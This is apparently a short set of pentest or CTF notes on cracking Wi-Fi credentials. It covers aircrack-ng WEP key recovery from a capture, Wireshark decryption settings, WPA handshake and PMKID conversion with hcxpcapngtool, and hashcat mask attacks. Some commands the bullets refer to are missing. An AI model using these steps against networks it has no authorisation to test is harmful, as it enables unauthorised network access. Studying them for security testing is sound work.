Aircrack-ng

Aircrack-ng WEP Attack

• understand your pcap

capinfos wep.pcap
aircrack-ng wep.pcap

• it will prompt you to select the network, and then it will try to recover the key

• if your attack is successful the key will look something like this

E1:26:9E:0F:19:4A:A7:2A:9D:32:53:53:52

WEP Key Decrypt Wireshark Capture

• with key in hand go to: Edit | Preferences

• Expand Protocols tree, and then scroll and select the IEEE 802.11

• Make sure the Wireshark Ignore the Protection bit option is set to No.

• Make sure Enable decryption is selected

• To specify a key to use in decryption, click the Edit... button to open the WEP and WPA Decryption Keys dialog

• add your key by pressing the + button

• Hit Ok twice and your packets will be decrypted

Four way Handshake Cracking

• Easy to filter on handshake traffic with eapol Wireshark filter

• If you have the 4 way handshake it can be cracked with

• if that is failing due to the password not being in the wordlist you can easily add permutation to it

hcxpcapngtool for Hashcat

• before being utilizing hashcat to crack to crack a handshake we need to conver it with hcxpcapngtool

• examining the file

• there was only one handshake captured, however we can see two hashes.

• the first one is the PMKID and the second is the the four way handshake hash

• Note: The PMKID hash is outputted to the file even if that AP DOES NOT support PMKID. That means hashcat will never crack the hash if the AP does not support PMKID.

• the PMKID hash can be filtered out

Hashcat Mask Attack

• Many AP companies will have passwords with only partial variations, save yourself the time with a mask attack

• -m 22000 is for WPA2-PSK